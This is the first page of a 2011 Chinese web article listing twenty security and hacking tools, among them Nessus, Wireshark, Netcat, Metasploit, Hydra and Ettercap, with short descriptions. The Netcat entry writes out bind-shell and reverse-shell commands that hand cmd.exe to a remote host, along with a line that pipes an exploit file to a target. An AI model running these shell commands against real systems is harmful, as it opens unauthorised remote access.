网络安全与黑客工具TOP100

www.net130.com     日期:2011-2-16    浏览次数:
出处:http://www.cnking.org

一、Nessus
    是扫描UNIX漏洞的主力工具,随后栖身Windows。主要功能包括本地和远程安全审查,支持client/server结构,具有GTK图形界面,并支持脚本语言编写插件。属免费开源。

二、Wireshark
    说起Wireshark,不得不提Ethereal,Ethereal和Windows的sniffer pro并称网络嗅探工具双雄,不过和sniffer pro不同的是Ethereal在Linux类系统中应用更为广泛。而Wireshark则是Ethereal后续版本,是在Ethereal被收购后推出的最新网络嗅探软件,是功能强大的网络数据捕获工具,可分析网络数据流量,在第一时间发现蠕虫病毒,木马程序以及ARP欺骗等问题的根源。

三、Snort
    Snort免费跨平台,用作监视小型TCP/IP网的嗅探器、日志记录、侵入探测器。可运行linux/UNIX和Win,snort有三种工作模式:嗅探器、数据包记录器、网络入侵检测系统。
嗅探器模式是snort从网络上读出数据包然后显示控制台上。例如要把TCP/IP包头信息打印在屏幕上,需要输入命令:snort -v

四、Netcat
    netcat被誉为‘瑞士军刀',一个简单有用的工具,透过使用TCP或UDP协议的网络连接读写数据。它被设计成一个稳定的后门工具,是一个功能强大的网络调试和探测工具。
1)例子:连到192.168.x.x的TCP80端口的命令:nc -nvv 192.168.x.x 80
2) 监听本机的TCP80端口: nc -l -p 80
3) 扫描192.168.x.x的TCP80到TCP445的所有端口: nc -nvv -w2 -z 192.168.x.x 80-445
4)  绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口REMOTE主机绑定SHELL: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
5)REMOTE主机绑定SHELL并反向连接,例如:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口的命令:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
6)作攻击程序用,例子:连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'内容:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
7)作蜜罐用,例子:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
格式:nc -L -p 80

五、Metasploit Framework
    是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。

六、Hping2
    Hping2:一种网络探测工具,是ping的超级变种,这个小工具可以发送自定义的ICMP,UDP和TCP数据包,并接收所有反馈信息。例如可以设置时间间隔,数据包发送的频率(-i uX X为微秒),命令为:hping2 192.168.0.1 -c 2 -i u1000

七、Kismet
    Kismet是一个基于Linux的无线网络扫描程序,一个相当方便的工具,通过测量周围无线信号找到目标WLAN。当Kismet开始运行时,将会显示这个区域内它找到所有的无线局域网,“Name”列中所显示出来的就是WLAN中AP的SSID值,开始设定的目标WLAN也应该包含中其中,在这一行中,CH列的值(AP所使用的频道)应该与开始所记下的相同。在窗口的最右边显示的信息是Kismet发现的WLAN的数目,已被捕捉下来了的数据包、已加密了的数据包的数目等等。甚至当目标计算机已关闭时,Kismet也正可从我们的目标AP中检测到数据包,这是因为目标AP在不停地发出“beacons”,它将告之拥有无线网卡的计算机有一个AP在此范围内。

八、Tcpdump
    基于linux 的TcpDump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。tcpdump就是一种免费的网络分析工具,尤其其提供了源代码,公开了接口,因此具备很强的可扩展性,对于网络维护和入侵者都是非常有用的工具。

九、Cain and Abel
    是一款Windows平台下的口令恢复工具。它通过采用多种方式来恢复多种口令,采取方式包括:嗅探网络,使用字典、暴力、密码分析方法破解解密口令,记录VoIP会话,解码混杂口令,恢复无线网络密钥,揭示口令框中输入的口令(星号查看),披露缓冲口令和分析路由协议。这个工具没有利用任何软件漏洞或缺陷,它利用了协议标准、认证方法和缓冲机制本身存在的安全问题以及内在的弱点,其主要目的是简单地恢复多种程序的口令和凭证。该软件由两部分组成:Cain和Abel。Cain(Cain.exe)是程序的主图形界面,Abel是一个Windows服务,由文件Abel.exe和Abel.dll组成。

十、John the Ripper
    用于在已知密文的情况下尝试破解出明文的破解密码软件。目前的最新版本是 JOHN 1.4 版, 主要支持对 DES、 MD5 两种加密方式的密文进行破解工作。 它可以工作于多中不同 的机 型 以及多种不同的操作系统。

十一、Ettercap
      Ettercap最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析。Ettercap有5种sniffing工作方式:
(1)IPBASED:基于IP地址的sniffing方式,Ettercap根据源IP-PORT和目的IP-PORT来捕获数据包。
(2)MACBASED: 基于MAC地址的方式,Ettercap将根据源MAC和目的MAC来捕获数据包。
(3) ARPBASED : 基于ARP欺骗的方式下,Ettercap利用ARP欺骗在交换局域网内监听两个主机之间的通信(全双工)。
(4) SMARTARP: 在SMARTARP方式下,Ettercap利用ARP欺骗,监听交换网上某台主机与所有已知的其他主机(存在于主机表中的主机)之间的通信(全双工)。
(5) PUBLICARP : 在PUBLICARP方式下,Ettercap利用ARP欺骗,监听交换网上某台主机与所有其它主机之间的通信(半双工)。

十二、Nikto
     Nikto 是一款开放源代码的、功能强大的WEB扫描评估软件,能对web服务器多种安全项目进行测试的扫描软件,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题,它可以扫描指定主机的WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主机允许的 http模式等等。它也使用LibWhiske库,但通常比Whisker更新的更为频繁。Nikto是网管安全人员必备的WEB审计工具之一。

十三、Ping/telnet/dig/traceroute/whois/netstat:最基本的安全命令。

十四、OpenSSH / PuTTY / SSH
     SSH(Secure Shell)现在普遍应用于登录远程计算机或在其上执行命令。为不安全网络上的两台不互信计算机间通讯提供安全加密,代替非常不可靠的telnet/rlogin/rsh交互内容。大多unix使用开源的OpenSSH服务器和客户端程序。Windows用户更喜欢免费的PuTTY客户端,也可以运行在多种移动设备上。还有一些windows用户喜欢使用基于终端的OpenSSH模拟程序Cygwin。

十五、THC Hydra
    如果某人需要暴力破解一个远程认证服务,Hydra经常会是选择对象。它可以同时对30个以上的端口进行基于字典的快速破解,包括telnet、ftp、http、https、smb、多种数据库及其它服务。和THC Amap一样,Hydra来自于民间组织THC。

十六、Paros proxy
    proxy是架设在攻击者的浏览器和目标网站中间,所有的要求和回应都会被送到,藉此骇客得以仔细研究这些封包资讯,包括在网页传送中的、 变数,并可以修改这些变数后再送出。proxy功能齐全,具备网站弱点扫描和侦测能力,对一些常见的网页应用程式攻击,都可进行检测,甚至能够检测出不安全的网页元件。

十七、Dsniff
   Dsniff是一个高级的口令嗅探器,是第一批扩展了传统Sniffer概念的监听工具,将制造的数据包注入网络,并将通信数据重新定向到攻击者的机器。在这种方式下,Dsniff允许攻击者在交换环境的网络内窃听数据,甚至在攻击者和攻击目标不在同一个Lan,也能使攻击者收集到想要的数据。支持telnet 、ftp、smtp、pop、imap、http应用协议。 十八、NetStumbler
    NetStumbler 是一款专门用来寻找无线AP的工具,是目前最流行的无线搜寻工具。开启后能自动显示附近探测到的无线AP,并能显示这些无线AP的SSID、MAC地址、频段、速度、是否加密等信息。值得一提的是,NetStumbler可以显示设置了隐藏SSID的无线AP,在软件界面中可以看到该AP的绿灯在不断闪烁。在树状结构中列出了各频段检测到的无线AP。由于NetStumbler进行全面扫描,所以附近无线AP将一览无余。因为它是美国人开发的,所以只能检测1~11之间的11个频段,而国内无线频段分为13个频段,12~13频段的无线AP将无法搜寻到。

十九、THC Amap
    它可以检测出某一端口正在被什么程序监听。因为其独有的version detection特性,所以其数据库不会象Nmap一样变得很大,在Nmap检测某一服务失败或者其它软件不起作用时可以考虑使用之。Amap的另一特性是其能够解析Nmap输出文件。这也是THC贡献的另一款很有价值的工具。

二十、GFI LANguard
    企业网络漏洞管理的三大主要问题:网络扫描、网络审计和补丁管理。GFI LANguard Network Security Scanner (N.S.S.) 是一项屡获殊荣的解决方案,能够扫描、检测、评估和修复网络中的任何安全漏洞。作为管理员您经常需要处理各种不同的问题,有时会使用多种产品分别处理与网络漏洞、补丁管理和网络审计相关的问题。使用 GFI LANguard N.S.S.,漏洞管理的三大主要问题可以通过带有丰富报告功能的单个控制台得以解决。/post/732.html

本新闻共4页,当前在第1页  1  2  3  4  

分享道
相关新闻